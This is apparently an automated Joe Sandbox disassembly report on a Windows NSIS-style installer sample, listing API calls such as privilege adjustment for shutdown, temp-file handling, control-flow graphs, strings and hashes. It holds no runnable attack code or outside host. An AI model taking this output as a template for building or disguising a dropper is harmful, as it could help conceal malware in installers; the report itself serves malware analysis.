                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                                              • CopyFileW.KERNEL32(00438800,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                                              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                              • ExitProcess.KERNEL32 ref: 00403B13
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 424501083-2266443568
                                              • Opcode ID: 192a59dcd8014d98a74b0244e035758c3ace76d32184e7546451a3a8955dee98
                                              • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                                              • Opcode Fuzzy Hash: 192a59dcd8014d98a74b0244e035758c3ace76d32184e7546451a3a8955dee98
                                              • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 362 406c5b-406c60 363 406cd1-406cef 362->363 364 406c62-406c91 362->364 367 4072c7-4072dc 363->367 365 406c93-406c96 364->365 366 406c98-406c9c 364->366 368 406ca8-406cab 365->368 369 406ca4 366->369 370 406c9e-406ca2 366->370 371 4072f6-40730c 367->371 372 4072de-4072f4 367->372 374 406cc9-406ccc 368->374 375 406cad-406cb6 368->375 369->368 370->368 373 40730f-407316 371->373 372->373 379 407318-40731c 373->379 380 40733d-407349 373->380 378 406e9e-406ebc 374->378 376 406cb8 375->376 377 406cbb-406cc7 375->377 376->377 386 406d31-406d5f 377->386 384 406ed4-406ee6 378->384 385 406ebe-406ed2 378->385 381 407322-40733a 379->381 382 4074cb-4074d5 379->382 387 406adf-406ae8 380->387 381->380 388 4074e1-4074f4 382->388 391 406ee9-406ef3 384->391 385->391 389 406d61-406d79 386->389 390 406d7b-406d95 386->390 396 4074f6 387->396 397 406aee 387->397 393 4074f9-4074fd 388->393 392 406d98-406da2 389->392 390->392 394 406ef5 391->394 395 406e96-406e9c 391->395 399 406da8 392->399 400 406d19-406d1f 392->400 412 406e7b-406e93 394->412 413 40747d-407487 394->413 395->378 398 406e3a-406e44 395->398 396->393 402 406af5-406af9 397->402 403 406c35-406c56 397->403 404 406b9a-406b9e 397->404 405 406c0a-406c0e 397->405 408 407489-407493 398->408 409 406e4a-407013 398->409 418 407465-40746f 399->418 419 406cfe-406d16 399->419 410 406dd2-406dd8 400->410 411 406d25-406d2b 400->411 402->388 417 406aff-406b0c 402->417 403->367 415 406ba4-406bbd 404->415 416 40744a-407454 404->416 406 406c14-406c28 405->406 407 407459-407463 405->407 420 406c2b-406c33 406->420 407->388 408->388 409->387 422 406e36 410->422 424 406dda-406df8 410->424 411->386 411->422 412->395 413->388 423 406bc0-406bc4 415->423 416->388 417->396 425 406b12-406b58 417->425 418->388 419->400 420->403 420->405 422->398 423->404 428 406bc6-406bcc 423->428 429 406e10-406e22 424->429 430 406dfa-406e0e 424->430 426 406b80-406b82 425->426 427 406b5a-406b5e 425->427 433 406b90-406b98 426->433 434 406b84-406b8e 426->434 431 406b60-406b63 GlobalFree 427->431 432 406b69-406b77 GlobalAlloc 427->432 435 406bf6-406c08 428->435 436 406bce-406bd5 428->436 437 406e25-406e2f 429->437 430->437 431->432 432->396 438 406b7d 432->438 433->423 434->433 434->434 435->420 439 406be0-406bf0 GlobalAlloc 436->439 440 406bd7-406bda GlobalFree 436->440 437->410 441 406e31 437->441 438->426 439->396 439->435 440->439 443 407471-40747b 441->443 444 406db7-406dcf 441->444 443->388 444->410
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                              • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                                              • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                              • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 137 403c0b-403c23 call 406931 140 403c25-403c30 GetUserDefaultUILanguage call 406483 137->140 141 403c37-403c6e call 40640a 137->141 144 403c35 140->144 147 403c70-403c81 call 40640a 141->147 148 403c86-403c8c lstrcatW 141->148 146 403c91-403cba call 403ee1 call 405f19 144->146 154 403cc0-403cc5 146->154 155 403d4c-403d54 call 405f19 146->155 147->148 148->146 154->155 156 403ccb-403cf3 call 40640a 154->156 161 403d62-403d87 LoadImageW 155->161 162 403d56-403d5d call 406579 155->162 156->155 163 403cf5-403cf9 156->163 165 403e08-403e10 call 40140b 161->165 166 403d89-403db9 RegisterClassW 161->166 162->161 167 403d0b-403d17 lstrlenW 163->167 168 403cfb-403d08 call 405e3e 163->168 177 403e12-403e15 165->177 178 403e1a-403e25 call 403ee1 165->178 169 403ed7 166->169 170 403dbf-403e03 SystemParametersInfoW CreateWindowExW 166->170 174 403d19-403d27 lstrcmpiW 167->174 175 403d3f-403d47 call 405e11 call 40653c 167->175 168->167 173 403ed9-403ee0 169->173 170->165 174->175 181 403d29-403d33 GetFileAttributesW 174->181 175->155 177->173 189 403e2b-403e45 ShowWindow call 4068c1 178->189 190 403eae-403eb6 call 405677 178->190 184 403d35-403d37 181->184 185 403d39-403d3a call 405e5d 181->185 184->175 184->185 185->175 197 403e51-403e63 GetClassInfoW 189->197 198 403e47-403e4c call 4068c1 189->198 195 403ed0-403ed2 call 40140b 190->195 196 403eb8-403ebe 190->196 195->169 196->177 199 403ec4-403ecb call 40140b 196->199 202 403e65-403e75 GetClassInfoW RegisterClassW 197->202 203 403e7b-403eac DialogBoxParamW call 40140b call 403b5b 197->203 198->197 199->177 202->203 203->173
                                              APIs
                                                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,00000000), ref: 00403C25
                                                • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                              • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
                                              • lstrlenW.KERNEL32(open cmd,?,?,?,open cmd,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403D0C
                                              • lstrcmpiW.KERNEL32(?,.exe,open cmd,?,?,?,open cmd,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                                              • GetFileAttributesW.KERNEL32(open cmd), ref: 00403D2A
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403D73
                                              • RegisterClassW.USER32(00429200), ref: 00403DB0
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                                              • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                                              • RegisterClassW.USER32(00429200), ref: 00403E75
                                              • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$open cmd
                                              • API String ID: 606308-3154666466
                                              • Opcode ID: 48322becd3d8efe0cd832b317988b4041c355d21bd462e37230b45ba98bd7fc7
                                              • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                                              • Opcode Fuzzy Hash: 48322becd3d8efe0cd832b317988b4041c355d21bd462e37230b45ba98bd7fc7
                                              • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 210 403068-4030b6 GetTickCount GetModuleFileNameW call 406032 213 4030c2-4030f0 call 40653c call 405e5d call 40653c GetFileSize 210->213 214 4030b8-4030bd 210->214 222 4030f6 213->222 223 4031db-4031e9 call 402fc6 213->223 215 403302-403306 214->215 225 4030fb-403112 222->225 229 4032ba-4032bf 223->229 230 4031ef-4031f2 223->230 227 403114 225->227 228 403116-40311f call 40357a 225->228 227->228 237 403125-40312c 228->237 238 403276-40327e call 402fc6 228->238 229->215 232 4031f4-40320c call 403590 call 40357a 230->232 233 40321e-40326a GlobalAlloc call 406a8c call 406061 CreateFileW 230->233 232->229 261 403212-403218 232->261 259 403280-4032b0 call 403590 call 403309 233->259 260 40326c-403271 233->260 242 4031a8-4031ac 237->242 243 40312e-403142 call 405fed 237->243 238->229 248 4031b6-4031bc 242->248 249 4031ae-4031b5 call 402fc6 242->249 243->248 257 403144-40314b 243->257 250 4031cb-4031d3 248->250 251 4031be-4031c8 call 406a1e 248->251 249->248 250->225 258 4031d9 250->258 251->250 257->248 264 40314d-403154 257->264 258->223 271 4032b5-4032b8 259->271 260->215 261->229 261->233 264->248 266 403156-40315d 264->266 266->248 268 40315f-403166 266->268 268->248 270 403168-403188 268->270 270->229 272 40318e-403192 270->272 271->229 273 4032c1-4032d2 271->273 274 403194-403198 272->274 275 40319a-4031a2 272->275 276 4032d4 273->276 277 4032da-4032df 273->277 274->258 274->275 275->248 279 4031a4-4031a6 275->279 276->277 278 4032e0-4032e6 277->278 278->278 280 4032e8-403300 call 405fed 278->280 279->248 280->215
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040307C
                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00403098
                                                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 004030E1
                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
                                              Strings
                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
                                              • Inst, xrefs: 0040314D
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
                                              • Null, xrefs: 0040315F
                                              • Error launching installer, xrefs: 004030B8
                                              • soft, xrefs: 00403156
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-554360561
                                              • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                              • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                                              • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                              • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 283 40176f-401794 call 402d3e call 405e88 288 401796-40179c call 40653c 283->288 289 40179e-4017b0 call 40653c call 405e11 lstrcatW 283->289 294 4017b5-4017b6 call 4067eb 288->294 289->294 298 4017bb-4017bf 294->298 299 4017c1-4017cb call 40689a 298->299 300 4017f2-4017f5 298->300 307 4017dd-4017ef 299->307 308 4017cd-4017db CompareFileTime 299->308 301 4017f7-4017f8 call 40600d 300->301 302 4017fd-401819 call 406032 300->302 301->302 310 40181b-40181e 302->310 311 40188d-4018b6 call 4055a4 call 403309 302->311 307->300 308->307 312 401820-40185e call 40653c * 2 call 406579 call 40653c call 405ba2 310->312 313 40186f-401879 call 4055a4 310->313 323 4018b8-4018bc 311->323 324 4018be-4018ca SetFileTime 311->324 312->298 345 401864-401865 312->345 325 401882-401888 313->325 323->324 327 4018d0-4018db FindCloseChangeNotification 323->327 324->327 328 402bcb 325->328 331 4018e1-4018e4 327->331 332 402bc2-402bc5 327->332 333 402bcd-402bd1 328->333 335 4018e6-4018f7 call 406579 lstrcatW 331->335 336 4018f9-4018fc call 406579 331->336 332->328 342 401901-40239a call 405ba2 335->342 336->342 342->332 342->333 345->325 347 401867-401868 345->347 347->313
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,00436000,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: open$open cmd
                                              • API String ID: 1941528284-3636087326
                                              • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
                                              • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                                              • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
                                              • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 349 4068c1-4068e1 GetSystemDirectoryW 350 4068e3 349->350 351 4068e5-4068e7 349->351 350->351 352 4068f8-4068fa 351->352 353 4068e9-4068f2 351->353 355 4068fb-40692e wsprintfW LoadLibraryExW 352->355 353->352 354 4068f4-4068f6 353->354 354->355
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                              • wsprintfW.USER32 ref: 00406913
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                              • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                              • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 356 406061-40606d 357 40606e-4060a2 GetTickCount GetTempFileNameW 356->357 358 4060b1-4060b3 357->358 359 4060a4-4060a6 357->359 361 4060ab-4060ae 358->361 359->357 360 4060a8 359->360 360->361
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040607F
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-678247507
                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                              • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                              • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 445 407090-407096 446 407098-40709a 445->446 447 40709b-4070b9 445->447 446->447 448 4072c7-4072dc 447->448 449 40738c-407399 447->449 451 4072f6-40730c 448->451 452 4072de-4072f4 448->452 450 4073c3-4073c7 449->450 453 407427-40743a 450->453 454 4073c9-4073ea 450->454 455 40730f-407316 451->455 452->455 458 407343-407349 453->458 456 407403-407416 454->456 457 4073ec-407401 454->457 459 407318-40731c 455->459 460 40733d 455->460 461 407419-407420 456->461 457->461 468 4074f6 458->468 469 406aee 458->469 462 407322-40733a 459->462 463 4074cb-4074d5 459->463 460->458 465 4073c0 461->465 466 407422 461->466 462->460 467 4074e1-4074f4 463->467 465->450 480 4073a5-4073bd 466->480 481 4074d7 466->481 471 4074f9-4074fd 467->471 468->471 472 406af5-406af9 469->472 473 406c35-406c56 469->473 474 406b9a-406b9e 469->474 475 406c0a-406c0e 469->475 472->467 482 406aff-406b0c 472->482 473->448 478 406ba4-406bbd 474->478 479 40744a-407454 474->479 476 406c14-406c28 475->476 477 407459-407463 475->477 483 406c2b-406c33 476->483 477->467 484 406bc0-406bc4 478->484 479->467 480->465 481->467 482->468 485 406b12-406b58 482->485 483->473 483->475 484->474 488 406bc6-406bcc 484->488 486 406b80-406b82 485->486 487 406b5a-406b5e 485->487 491 406b90-406b98 486->491 492 406b84-406b8e 486->492 489 406b60-406b63 GlobalFree 487->489 490 406b69-406b77 GlobalAlloc 487->490 493 406bf6-406c08 488->493 494 406bce-406bd5 488->494 489->490 490->468 495 406b7d 490->495 491->484 492->491 492->492 493->483 496 406be0-406bf0 GlobalAlloc 494->496 497 406bd7-406bda GlobalFree 494->497 495->486 496->468 496->493 497->496
                                              Memory Dump Source
